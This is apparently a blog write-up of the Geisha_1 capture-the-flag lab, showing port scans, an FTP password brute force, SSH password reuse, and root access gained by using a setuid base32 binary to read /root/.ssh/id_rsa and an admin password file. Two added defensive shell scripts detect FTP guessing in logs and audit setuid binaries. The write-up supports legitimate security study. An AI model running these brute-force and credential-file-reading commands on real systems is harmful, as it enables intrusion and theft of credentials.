Geisha_1 target machine

Information gathering

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.145
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-29 22:52 EDT
Nmap scan report for 192.1.1.145
Host is up (0.00011s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
7080/tcp open empowerid
7125/tcp open unknown
8088/tcp open radan-http
9198/tcp open unknown
MAC Address: 00:0C:29:B4:24:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds

Quite a few ports are open, so the chance of rabbit holes is high.

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80,7080,7125,8088,9198 192.1.1.145
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-29 22:56 EDT
Nmap scan report for 192.1.1.145
Host is up (0.00026s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
| 256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_ 256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Geisha
7080/tcp open ssl/http LiteSpeed httpd
|_http-server-header: LiteSpeed
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-09T14:01:34
|_Not valid after: 2022-05-09T14:01:34
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_http-title: Geisha
|_ssl-date: TLS randomness does not represent time
7125/tcp open http nginx 1.17.10
|_http-title: Geisha
|_http-server-header: nginx/1.17.10
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Geisha
9198/tcp open http SimpleHTTPServer 0.6 (Python 2.7.16)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.16
|_http-title: Geisha
MAC Address: 00:0C:29:B4:24:08 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.05 seconds

The information is rather scattered, so finish the usual three-scan routine first.

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo nmap --script=vuln -p21,22,80,7080,7125,8088,9198 192.1.1.145
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-29 22:57 EDT
Nmap scan report for 192.1.1.145
Host is up (0.00025s latency).

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /info.php: Possible information file
7080/tcp open empowerid
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <html><head><title>400 Bad Request</title></head><body>
| <h2>HTTPS is required</h2>
| <p>This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.<br />
| <blockquote>Hint: The URL should starts with <b>https</b>://</blockquote> </p>
| <hr />
| Powered By LiteSpeed Web Server<br />
| <a href='http://www.litespeedtech.com'><i>http://www.litespeedtech.com</i></a>
|_</body></html>
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-passwd: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
7125/tcp open unknown
8088/tcp open radan-http
| http-enum:
|_ /info.php: Possible information file
9198/tcp open unknown
MAC Address: 00:0C:29:B4:24:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 331.59 seconds

There is not much useful information. To summarize:

21 ftp 
22 ssh
80 Apache
7080 LiteSpeed
7125 nginx
8088 LiteSpeed
9198 SimpleHTTPServer

First I tried an anonymous FTP login (the nmap script scan actually checks for anonymous FTP login already); it failed.

I then brute-forced directories on each port in turn and found a /passwd path on port 7125.

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo dirsearch -u http://192.1.1.145:7125
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.145-7125/_23-08-30_02-54-18.txt

Error Log: /root/.dirsearch/logs/errors-23-08-30_02-54-18.log

Target: http://192.1.1.145:7125/

[02:54:18] Starting:
[02:54:37] 200 - 175B - /index.php
[02:54:37] 200 - 175B - /index.php/login/
[02:54:42] 200 - 1KB - /passwd

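My first thought was that this might be a file inclusion vulnerability. I tested it and it is not, although a request for /shadow returns 403. The contents of the passwd file are as follows: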

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin

This yields one username: geisha

FTP brute force

Try brute-forcing FTP:

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo hydra -l geisha -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 192.1.1.145 ftp
[sudo] password for kali:
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-29 22:54:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 9999 login tries (l:1/p:9999), ~625 tries per task
[DATA] attacking ftp://192.1.1.145:21/
[21][ftp] host: 192.1.1.145 login: geisha password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-29 22:55:33

Logging in to FTP with this password succeeded, and I did a quick collection of files.
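From the defender's side, a guessing run like the one above leaves a clear trail in the FTP server log. The following is an added example, not part of the original write-up: it scans vsftpd log lines for a successful login that follows a burst of failures. The log lines are constructed, and the client addresses, threshold and function names are assumptions.

```shell
#!/bin/sh
# Added example: spot a password-guessing run against FTP that ended in a success.
# Input: vsftpd.log lines on stdin (vsftpd's own log format, not xferlog).

# Assumed threshold: failures per (client, user) before a success counts as guessed.
FAIL_THRESHOLD=5

# Print "<client> <user> <failures>" for each successful login preceded by
# at least FAIL_THRESHOLD failed logins from the same client for the same user.
guessed_logins() {
    awk -v limit="$FAIL_THRESHOLD" '
        / (FAIL|OK) LOGIN: Client / {
            # user is the second [...] group, client is the quoted address
            user = $0; sub(/^[^]]*\] \[/, "", user); sub(/\].*$/, "", user)
            client = $0; sub(/^[^"]*"/, "", client); sub(/".*$/, "", client)
            key = client " " user
            if ($0 ~ / FAIL LOGIN: /) { fails[key]++; next }
            if (fails[key] >= limit) print key, fails[key]
            fails[key] = 0     # a success resets the counter
        }'
}

# Constructed sample log: one guessing client, one user who mistyped once.
sample_vsftpd_log() {
    cat <<'EOF'
Tue Aug 29 22:54:40 2023 [pid 4101] [geisha] FAIL LOGIN: Client "192.0.2.10"
Tue Aug 29 22:54:41 2023 [pid 4103] [geisha] FAIL LOGIN: Client "192.0.2.10"
Tue Aug 29 22:54:41 2023 [pid 4105] [geisha] FAIL LOGIN: Client "192.0.2.10"
Tue Aug 29 22:54:43 2023 [pid 4107] [geisha] FAIL LOGIN: Client "192.0.2.10"
Tue Aug 29 22:54:44 2023 [pid 4109] [geisha] FAIL LOGIN: Client "192.0.2.10"
Tue Aug 29 22:54:46 2023 [pid 4111] [geisha] FAIL LOGIN: Client "192.0.2.10"
Tue Aug 29 22:55:30 2023 [pid 4113] [geisha] OK LOGIN: Client "192.0.2.10"
Tue Aug 29 23:10:02 2023 [pid 4200] [geisha] FAIL LOGIN: Client "192.0.2.20"
Tue Aug 29 23:10:15 2023 [pid 4202] [geisha] OK LOGIN: Client "192.0.2.20"
EOF
}

sample_vsftpd_log | guessed_logins
```

Only the first client is reported; the single mistyped password from the second client stays below the threshold.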

SSH login via password reuse

I tested whether the SSH password is the same as the FTP password.

geisha@geisha:~$ sudo -l
[sudo] password for geisha:
Sorry, user geisha may not run sudo on geisha.
geisha@geisha:~$ uname -a
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64 GNU/Linux
geisha@geisha:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:b4:24:08 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.145/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1779sec preferred_lft 1779sec
inet6 fe80::20c:29ff:feb4:2408/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:b0:73:a4:a9 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-c987d2b66beb: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ee:8e:c2:ab brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-c987d2b66beb
valid_lft forever preferred_lft forever
inet6 fe80::42:eeff:fe8e:c2ab/64 scope link
valid_lft forever preferred_lft forever
1146: vethfb3bc15@if1145: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default
link/ether 6a:c7:c5:c3:8c:15 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::68c7:c5ff:fec3:8c15/64 scope link
valid_lft forever preferred_lft forever
1148: vethb95d0a1@if1147: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default
link/ether aa:f4:7a:20:c8:c9 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::a8f4:7aff:fe20:c8c9/64 scope link
valid_lft forever preferred_lft forever
geisha@geisha:~$ id
uid=1000(geisha) gid=1000(geisha) groups=1000(geisha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Login succeeded.

Privilege escalation

Now to work out how to escalate privileges.

geisha@geisha:~$ find / -type f -perm -04000 -ls 2>/dev/null
1972743 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
1972645 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
2359743 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
1969427 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
1966119 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
1969808 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
1969565 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
1966116 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
1967637 44 -rwsr-sr-x 1 root root 43712 Feb 28 2019 /usr/bin/base32
1967184 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
1966118 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
1966115 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
1969806 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount

base32 is SUID, so it should allow arbitrary file read. I read the shadow file this way, but could not crack the root password.
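The same listing is what a hardening audit should catch. The following is an added example, not part of the original write-up: it takes `find ... -ls` output like the listing above and reports setuid files that are missing from a baseline. The baseline list and the function names are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example: flag setuid binaries that are not on an expected baseline.
# Input: the output of `find / -type f -perm -04000 -ls` on stdin.

# Assumed baseline of setuid binaries expected on this image (one path per line).
# It is an assumption for illustration; adjust it to your own build.
SUID_BASELINE='/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount'

# Print "<mode> <owner> <path>" for every setuid entry that is not in the baseline.
unexpected_suid() {
    SUID_BASELINE="$SUID_BASELINE" awk '
        BEGIN { n = split(ENVIRON["SUID_BASELINE"], b, "\n")
                for (i = 1; i <= n; i++) ok[b[i]] = 1 }
        # find -ls columns: inode blocks mode links owner group size month day year path
        NF >= 11 && $3 ~ /^-..[sS]/ {
            path = $11
            for (i = 12; i <= NF; i++) path = path " " $i   # paths containing spaces
            if (!(path in ok)) print $3, $5, path
        }'
}

# Constructed sample: three lines copied from the find output above.
sample_find_output() {
    cat <<'EOF'
1966119 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
1967637 44 -rwsr-sr-x 1 root root 43712 Feb 28 2019 /usr/bin/base32
1967184 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
EOF
}

sample_find_output | unexpected_suid
```

Against the full listing on this host the only hit is /usr/bin/base32; clearing the bit with `chmod u-s /usr/bin/base32` removes the root-privileged file read.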

Next I checked scheduled tasks, the permissions on the passwd and shadow files, and linpeas. Summary of the results:

21 ftp geisha:letmein
22 ssh geisha:letmein
80 Apache /var/www/html
7080 LiteSpeed /usr/local/lsws/admin/html

7125 /opt/nginx/www
9198 root python -m SimpleHTTPServer 9198

# Read the adminpasswd file using base32
base32 /usr/local/lsws/adminpasswd | base32 --decode
WebAdmin user/password is admin/NTk4MTQ3

docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/d53b34acf079c584129574b2b1925ff972ccc0762b53a872daa55704c2913f9e -address /var/run/docker/containerd/containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc

I tried a john crack using the password obtained; it failed.

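There is no gcc, so I did not consider kernel privilege escalation, and I was stuck here for a long time. My original idea was that some path on the website could be logged in to with admin/NTk4MTQ3, and that uploaded files might run with root privileges by default, leading to a reverse shell for privilege escalation. But I did not find such a path.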

Reading sensitive files in the .ssh folder via SUID base32

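In the end I read a write-up and found that the approach is to use base32's arbitrary file read to read the sensitive files in the .ssh folder under root's home directory. I really had not thought of that, though I had tried reading the flag directly, which worked (I tried root.txt and flag.txt).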

geisha@geisha:/etc/ssh$ base32 /root/root.txt | base32 --decode
base32: /root/root.txt: No such file or directory
geisha@geisha:/etc/ssh$ base32 /root/flag.txt | base32 --decode
Flag{Sun_CTF_220_5_G31sha}
geisha@geisha:/etc/ssh$ base32 /root/.ssh/id_rsa | base32 --decode
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ vim rsakey


┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ chmod 600 rsakey


┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ ssh -i rsakey root@192.1.1.145
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May 9 12:03:57 2020 from 192.168.1.21
root@geisha:~# cd /root
root@geisha:~# ls
flag.txt
root@geisha:~# whoami
root
root@geisha:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:b4:24:08 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.145/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1138sec preferred_lft 1138sec
inet6 fe80::20c:29ff:feb4:2408/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:b0:73:a4:a9 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-c987d2b66beb: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ee:8e:c2:ab brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-c987d2b66beb
valid_lft forever preferred_lft forever
inet6 fe80::42:eeff:fe8e:c2ab/64 scope link
valid_lft forever preferred_lft forever
1590: vethdb2139e@if1589: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default
link/ether 92:cf:34:bd:2d:e9 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::90cf:34ff:febd:2de9/64 scope link
valid_lft forever preferred_lft forever
1592: veth4a06cb7@if1591: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default
link/ether 4a:d7:e0:f7:06:23 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::48d7:e0ff:fef7:623/64 scope link
valid_lft forever preferred_lft forever
root@geisha:~# uname -a
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64 GNU/Linux

If this approach does not come to mind here, you can look through autowords to consider which sensitive files to read.


https://i3eg1nner.github.io/2023/08/9ad2d44c60f1.html
Author: I3eg1nner
Published: August 30, 2023